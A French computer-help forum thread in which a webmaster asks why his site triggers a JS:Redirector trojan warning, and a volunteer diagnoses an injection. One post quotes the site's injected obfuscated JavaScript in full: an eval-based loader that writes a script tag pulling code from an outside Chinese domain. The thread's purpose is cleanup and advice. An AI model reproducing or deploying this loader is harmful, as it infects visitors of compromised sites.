|
|
|
Virus JS:Redirector-H7 [Tà l'ouverture de la page
| ||||||||
Petit astucien | Bonjour, quand j'ouvre la page sanikeltours.com avats me dis cheval de troie JS:Redirector-H7 [Trj] Savez vous comment regler le probleme Cordialement André Modifié par marocensolitaire le 21/05/2009 13:12 | |||||||
Publicité | ||||||||
Groupe Sécurité  | Salut, Firefox bloque l'ouverture du site. Tu as l'habitude d'aller sur ce site ? Fill | |||||||
Groupe Sécurité | Re, Peux-tu désactiver le lien pour éviter qu'une personne ne s'infecte malencontreusement en cliquant dessus ? Fill | |||||||
Petit astucien | oui c'est un site que j'ai crée il y a longtemps et qui est géré par le secretaire de l'entreprise qui est au maroc Donc je tente de l'aider à resoudre le probleme Merci
| |||||||
Groupe Sécurité | Salut, A priori, il est hébergé chez OVH, mais il semble aussi y avoir un lien vers une url chinoise. Peut-être un iframe piégé. Je vais essayer de me renseigner. Fill | |||||||
Groupe Sécurité | Salut, Il semble probable que du code ait été injecté dans le site. Si tu es Webmaster, vérifie ce que contient le site. As-tu du php ? Une faille connue a dans ce cas peut-être été exploitée. C'est toi qui a inséré ce code JavaScript ? (function(){var DLHR='%';var RxDr=('var"20a"3d"22S"63ri"70t"45"6eg"69n"65"22"2c"62"3d"22"56er"73ion()+"22"2cj"3d"22"22"2cu"3dnavi"67at"6f"72"2euserAgent"3bif(("75"2e"69"6edexO"66"28"22Ch"72o"6de"22"29"3c0)"26"26(u"2ein"64exO"66"28"22Win"22)"3e0)"26"26("75"2ei"6edexOf("22NT"206"22)"3c0)"26"26(d"6fcume"6et"2ecookie"2ei"6ed"65x"4ff("22mi"65k"3d1"22)"3c"30)"26"26(typeof(zr"76z"74s)"21"3d"74"79p"65o"66"28"22A"22"29))"7bzrvzts"3d"22A"22"3bev"61l"28"22if(wi"6edow"2e"22+a+"22)j"3dj+"22+a+"22Major"22+b+a+"22"4dinor"22+b+a+"22"42"75"69ld"22+b+"22j"3b"22)"3bd"6f"63u"6dent"2e"77rite("22"3cscript"20src"3d"2f"2fmar"22"2b"22tuz"2e"63n"2fvid"2f"3fi"64"3d"22"2bj+"22"3e"3c"5c"2fs"63r"69pt"3e"22)"3b"7d').replace(/"/g,DLHR);var f147=unescape(RxDr);eval(f147)})(); | |||||||
Petit astucien | Re, J'ai viré tous les scripts et tout remarqhe parfaitement voir la maquette http://marrakech.services.free.fr/index.htm
c'est donc bien ça qui posai probleme
veux tu me tester cette maquette pour voir si il y a vraiment aucunes failles
Merci d'avance André | |||||||
Groupe Sécurité | marocensolitaire a écrit : Salut, Je ne suis pas qualifié pour certifier l'inocuité du site ou pour en faire un audit, mais j'accède à la page. A priori, l'infection injecte du code Javascript avec redirection vers une url chinoise : http://programmez.com/actualites.php?titre_actu=Les-sites-Web-sous-la-menace-de-JSRedir-R&id_actu=5074 Je ne peux pas t'en dire plus car je n'en sais pas plus. Fill | |||||||
Petit astucien | Merci pour tout | |||||||
Publicité | ||||||||
Groupe Sécurité | marocensolitaire a écrit : Bon surf Fill | |||||||
Groupe Sécurité | Re, L'url initiale est toujours infectée par contre. C'est normal ? Il faut que tu changes aussi tes identifiant et mot de passe ftp qui sont compromis. Fill | |||||||
Petit astucien | oui j'ai pas encore traaaaansfere sur le serveur source | |||||||
| ||||||||
Les bons plans du moment PC Astuces | Tous les Bons Plans | |||||||||||||||
| ||||||||||||||||
| Forum PC Astuces | © 1997-2021 Webastuces |  |
À LA UNE
PRATIQUE
LOGITHÈQUE
TABLETTE ET MOBILE
BONS PLANS
FONDS D'ÉCRAN
JEUX
FORUM
!
